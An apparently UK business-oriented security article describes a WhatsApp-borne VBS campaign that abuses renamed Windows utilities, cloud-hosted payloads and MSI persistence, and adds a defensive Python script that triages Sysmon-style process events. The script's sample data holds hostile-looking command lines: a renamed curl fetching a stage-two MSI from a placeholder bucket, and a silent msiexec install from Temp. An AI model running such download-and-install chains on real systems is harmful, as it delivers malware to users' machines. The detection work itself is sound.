A sophisticated malware campaign exploiting WhatsApp's ubiquity in UK business communications demonstrates how attackers now leverage trusted platforms and legitimate cloud infrastructure to bypass enterprise security controls. Microsoft Defender Experts documented this multi-stage attack beginning in late February 2026, revealing how cybercriminals weaponise social engineering alongside living-off-the-land techniques to establish persistent remote access.
The campaign deploys malicious Visual Basic Script files through WhatsApp messages, initiating an infection chain that uses renamed Windows utilities to blend into normal system activity whilst retrieving payloads from trusted cloud services including AWS, Tencent Cloud, and Backblaze B2. A living-off-the-land attack exploits legitimate system tools and trusted services to conduct malicious activities, making detection significantly more challenging for traditional security measures.
Key Facts:
- Campaign began in late February 2026, targeting organisations through WhatsApp social engineering
- Attackers use legitimate cloud services (AWS, Tencent Cloud, Backblaze B2) to host malicious payloads
- Malicious MSI packages establish persistence using renamed Windows utilities to evade detection
- Multi-stage infection chain combines social engineering with living-off-the-land techniques
How the Attack Exploits Business Communication Patterns
According to reporting from Microsoft's security blog, the campaign targets the intersection of personal and professional communication habits that define modern UK workplaces. WhatsApp's integration into business operations creates a trust environment that attackers exploit through carefully crafted messages containing VBS attachments. These scripts initiate a sophisticated payload delivery mechanism that leverages legitimate cloud infrastructure to avoid detection by URL filtering and reputation-based security controls.
The attack's sophistication lies in its abuse of standard business tools and services. Rather than relying on obviously malicious infrastructure, operators host command-and-control communications and payload delivery through services that organisations routinely whitelist for legitimate business functions. This approach exploits the supply chain trust model that continues to challenge UK enterprises by weaponising the very cloud services businesses depend upon for daily operations.
Why Traditional Endpoint Security Fails Against MSI Persistence
The campaign's use of Microsoft Installer packages represents a calculated evolution in persistence techniques. MSI files carry inherent legitimacy within Windows environments, often bypassing application whitelisting and endpoint detection controls that focus on executable files. The malware authors compound this advantage by renaming legitimate Windows utilities, creating a detection challenge that requires behavioural analysis rather than signature-based identification.
The NCSC's guidance on living-off-the-land attacks specifically warns that these techniques "exploit the legitimate functionality of operating systems and installed software to conduct malicious activities". This campaign exemplifies that warning by transforming routine system administration tools into components of a persistent backdoor infrastructure. Traditional antivirus solutions struggle with this approach because the individual components appear legitimate when examined in isolation.
What UK Mid-Market Organisations Must Address Immediately
This campaign exposes critical gaps in how UK organisations approach social engineering defence and endpoint monitoring. The attack succeeds because it exploits the convergence of personal communication platforms with business operations, a reality that most security policies fail to address comprehensively. Organisations must urgently evaluate whether their current controls can detect and respond to attacks that leverage legitimate system tools and trusted cloud services.
The timing is particularly concerning given the increasing sophistication of attacks targeting UK businesses. The campaign's operators demonstrate advanced understanding of enterprise security controls, designing their approach to exploit specific blind spots in detection capabilities. This level of sophistication suggests state-sponsored or professionally organised threat actors targeting UK commercial interests through channels that traditional security awareness training rarely addresses.
Boardroom Questions
- How effectively can our current endpoint detection capabilities identify malicious activity that uses legitimate Windows utilities and trusted cloud services?
- What controls do we have in place to prevent employees from executing attachments received through personal communication platforms like WhatsApp?
- How quickly could our security team detect and respond to an MSI-based persistence mechanism that blends into normal system administration activities?
Quick Diagnostic
- Can your endpoint detection solution identify when legitimate Windows utilities are renamed or used in unusual contexts?
- Do your security policies explicitly address the risks of file sharing through personal messaging platforms like WhatsApp?
- Would your security team detect an attacker using AWS or similar trusted cloud services to host command-and-control infrastructure?
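The renamed-utility and MSI-persistence behaviour described above, and the first two Quick Diagnostic questions, come down to checks an endpoint team can run against its own process telemetry. The script below is an added example written for this page, not code from Microsoft Defender Experts or from the campaign report. It assumes Sysmon-style process-creation events (Event ID 1 exposes Image, OriginalFileName, ParentImage and CommandLine), and the sample events, user name, paths and bucket hostname are constructed placeholders rather than indicators from the campaign. It flags three things the page describes: a binary whose on-disk name differs from the OriginalFileName recorded in its PE version resource (a renamed Windows utility), a process spawned by a Windows script host such as the VBS interpreter, and a quiet msiexec install from a user-writable directory.

```python
"""Flag renamed Windows utilities and script-host-driven MSI installs in
Sysmon-style process-creation events (added example, constructed data)."""
import ntpath

# Constructed sample events shaped like Sysmon Event ID 1 fields. The user
# name, paths and bucket hostname are placeholders, not campaign indicators.
SAMPLE_EVENTS = [
    {   # benign: the Windows Installer service starting normally
        "Image": r"C:\Windows\System32\msiexec.exe",
        "OriginalFileName": "msiexec.exe",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "CommandLine": "msiexec.exe /V",
    },
    {   # suspicious: curl.exe copied to Temp under a new name, launched by
        # the VBS interpreter, fetching a package from cloud object storage
        "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
        "OriginalFileName": "curl.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": "update.exe -s -o stage2.msi "
                       "https://example-bucket.s3.amazonaws.com/stage2.msi",
    },
    {   # suspicious: quiet MSI install from Temp, again parented by wscript
        "Image": r"C:\Windows\System32\msiexec.exe",
        "OriginalFileName": "msiexec.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\stage2.msi /qn",
    },
    {   # benign: an admin using curl from a shell against an internal host
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "curl.exe https://intranet.example/health",
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Lower-case path fragments that mark user-writable locations.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")


def _base(path):
    """Lower-case file name component of a Windows path (empty if missing)."""
    return ntpath.basename(path or "").lower()


def is_renamed_utility(ev):
    """On-disk name differs from the PE version-info OriginalFileName.

    A renamed LOLBin (curl, certutil, msiexec, ...) keeps its original name in
    the version resource unless the attacker strips it, so a mismatch is a
    strong signal. An empty OriginalFileName is not a match here but is
    itself worth a separate look.
    """
    orig = (ev.get("OriginalFileName") or "").lower()
    return bool(orig) and orig != _base(ev.get("Image"))


def has_script_host_parent(ev):
    """Process was spawned by wscript/cscript, the VBS delivery stage."""
    return _base(ev.get("ParentImage")) in SCRIPT_HOSTS


def is_quiet_msi_from_user_path(ev):
    """msiexec performing a silent install of a package in a user-writable dir."""
    if _base(ev.get("Image")) != "msiexec.exe":
        return False
    tokens = (ev.get("CommandLine") or "").lower().split()
    installs = "/i" in tokens
    quiet = any(t in ("/qn", "/quiet", "/q") for t in tokens)
    user_path = any(m in t for t in tokens for m in USER_WRITABLE)
    return installs and quiet and user_path


RULES = [
    ("renamed_utility", is_renamed_utility),
    ("script_host_parent", has_script_host_parent),
    ("quiet_msi_from_user_path", is_quiet_msi_from_user_path),
]


def triage(events):
    """Return [(event index, [rule names])] for events tripping any rule."""
    findings = []
    for i, ev in enumerate(events):
        hits = [name for name, rule in RULES if rule(ev)]
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Note that none of these rules looks at the destination hostname: as the article points out, a download from AWS or Backblaze B2 passes reputation filters, so the useful signal is the behavioural chain (script host, renamed tool, silent MSI from Temp) rather than where the payload lives. Events that trip two rules at once, like the second and third samples, are the ones worth escalating first.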